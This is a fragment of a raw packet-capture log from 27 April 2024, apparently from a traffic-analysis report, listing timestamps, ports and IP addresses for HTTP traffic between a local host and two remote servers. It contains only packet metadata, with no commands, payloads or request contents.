                                                                                                                                                      Apr 27, 2024 02:19:19.740895033 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.740956068 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.740974903 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.741034985 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:19.741046906 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.741097927 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:19.741131067 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.741177082 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:19.742347002 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.742418051 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.742460966 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.742500067 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.742585897 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.742626905 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.742672920 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.790013075 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.790088892 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:19.790153027 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.790205956 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:19.793319941 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.865628958 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.865720034 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:19.911726952 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.911744118 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.911825895 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:19.911854982 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.911931038 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:19.911932945 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.911998987 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:19.936309099 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.936407089 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.937299013 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.937316895 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.937374115 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.937392950 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.939980030 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.940037966 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.940062046 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.940121889 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.940140963 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.940181971 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.940196037 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.940228939 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.961568117 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.961647987 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:19.989645004 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.989712954 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:19.989840031 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:19.989901066 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.036657095 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.036755085 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.036763906 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.036843061 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.084645033 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.084748983 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.084753036 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.084779978 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.084820032 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.084872961 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.132852077 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.132930040 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.133948088 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.133997917 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.134141922 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.134246111 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.134382963 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.134471893 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.134475946 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.134527922 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.136975050 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.137022972 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.137075901 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.185138941 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.185223103 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.185281038 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.210038900 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.210167885 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.210170031 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.210225105 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.255920887 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.256084919 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.256089926 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.256134987 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.256215096 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.256262064 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.304934025 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.305011034 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.307056904 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.307135105 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.328561068 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.330672979 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.330729008 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.331001043 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.332928896 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.332973003 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.333005905 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.333137989 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.333178997 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.382113934 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.382209063 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.382322073 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.382385969 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.428373098 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.428456068 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.477617025 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.477701902 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.525278091 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.525372028 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.525413036 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.525455952 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.527514935 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.527529001 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.527544022 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.527550936 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.527579069 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.527604103 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.527643919 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.527658939 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.527678013 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.527703047 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.553185940 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.553235054 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.553248882 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.553303003 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.577384949 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.577461004 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.599673033 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.599751949 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.649821997 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.649912119 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.720033884 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.720086098 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.720139980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.720196009 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.722073078 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.722143888 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.722182989 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.722258091 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.725121021 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.725153923 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.725171089 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.725199938 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.762048960 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.772042990 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.772095919 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.773545027 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.822295904 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.822393894 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.824551105 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.897663116 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.897753000 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.897757053 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.897793055 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.897825956 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.897864103 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.915549994 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.915704966 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.915766954 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.917339087 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.917388916 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.917433023 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.917566061 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.943480968 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.943537951 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:20.957015038 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.957123041 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:20.993618965 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:20.993681908 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.020205975 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.069606066 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.069654942 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.069669008 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.069677114 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.069717884 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.069717884 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.074541092 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.110892057 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.110982895 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.111042023 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.112411976 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.112515926 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.112611055 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.115701914 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.115753889 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.152331114 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.152347088 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.152497053 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.165066957 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.165127993 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.241591930 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.241662025 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.241688013 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.241703033 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.241733074 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.241775036 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.271091938 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.288038969 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.288116932 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.307054996 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.307131052 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.307199001 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.308655977 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.308722019 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.308777094 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.337212086 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.337268114 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.348211050 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.348274946 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.348404884 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.348418951 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.348459005 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.412600994 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.412667990 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.412679911 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.412722111 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.412729979 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.412763119 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.458863020 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.458931923 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.459182024 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.459232092 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.503057957 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.503170013 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.503216982 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.507960081 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.507973909 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.508028984 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.509823084 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.509885073 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.544816017 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.544852018 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.544893980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.544895887 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.544971943 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.545013905 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.586508989 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.586565971 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.586642027 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.586689949 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.586796999 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.586846113 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.630278111 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.630337954 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.681448936 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.681483984 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.681530952 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.681530952 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.702460051 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.702476025 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.702531099 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.706885099 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.706948996 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.742589951 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.742605925 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.742671967 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.742710114 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.742723942 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.742867947 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.742867947 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.742892981 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.742933035 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.757195950 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.757365942 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.757385015 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.757426023 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.757486105 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.757536888 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.801558971 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.801645041 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.801677942 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.801733971 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.854068995 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.854325056 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.898845911 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.898895979 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.898927927 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.898993015 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.930229902 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.930310965 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.930418015 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.930485010 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:21.937688112 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.937798023 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.938478947 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.938534975 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.938541889 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.938580990 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                      Apr 27, 2024 02:19:21.973714113 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:21.973802090 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:22.027200937 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:22.027251005 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                      Apr 27, 2024 02:19:22.027313948 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:22.027355909 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                      Apr 27, 2024 02:19:22.095421076 CEST8049734176.97.76.106192.168.2.4
